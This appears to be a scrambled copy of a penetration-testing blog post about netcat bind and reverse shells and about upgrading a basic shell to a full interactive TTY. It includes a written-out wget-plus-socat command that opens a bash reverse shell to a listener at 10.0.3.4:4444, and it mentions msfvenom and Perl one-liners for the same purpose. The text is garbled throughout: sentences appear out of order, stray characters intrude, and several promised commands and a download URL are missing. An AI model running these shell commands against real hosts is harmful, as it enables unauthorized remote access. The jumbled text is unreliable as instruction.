As “catch 22” as this sounds, there are several options to get netcat on the remote machine, as well as execute the netcat (nc) command to provide us a shell. Preparing for Remote Shell Accessīoth of these shell options require that commands be run on the remote host, so that we can run commands on the remote host. These remote shell access methods typically take one of two forms – a bind shell, or a reverse shell. In network security, netcat is typically used to transfer files to/from a compromised host, or to access a shell/command prompt on a compromised host. You can set up and tear down connections on any machine with netcat binaries, and that machine can act as either a server or a client to communicate with other machines running either another instance of netcat, or other services like SMTP.
Basically it is possible to use a dumb netcat shell to upgrade to a full TTY by setting some stty options within your Kali terminal.įirst, follow the same technique as in Method 1 and use Python to spawn a PTY.The simplest definition of netcat is that it’s a network utility that’s used to read to and write from TCP or UDP connections. I watched Phineas Fisher use this technique in his hacking video, and it feels like magic. Method 3: Upgrading from netcat with magic It supports tab-completion, SIGINT/SIGSTP support, vim, up arrow history, etc.
On Kali, you’ll catch a fully interactive TTY session. Wget -q -O /tmp/socat chmod +x /tmp/socat /tmp/socat exec: 'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444 To upgrade a dumb shell, simply run the following command: The pty module let’s you spawn a psuedo-terminal that can fool commands like su into thinking they are being executed in a proper terminal. One of my go-to commands for a long time after catching a dumb shell was to use Python to spawn a pty. These can all be caught by using netcat and listening on the port specified (4444). For example, here’s a netcat command not requiring the -e flag:Īnd here’s a Perl oneliner in case netcat isn’t installed: Metasploit has several payloads under “cmd/unix” that can be used to generate one-liner bind or reverse shells:Īny of these payloads can be used with msfvenom to spit out the raw command needed (specifying LHOST, LPORT or RPORT). Pentest Monkey has a great cheatsheet outlining a few different methods, but my favorite technique is to use Metasploit’s msfvenom to generate the one-liner commands for me. The problem is not every server has netcat installed, and not every version of netcat has the -e option.
Long story short, while these shells are great to catch, I’d much rather operate in a fully interactive TTY.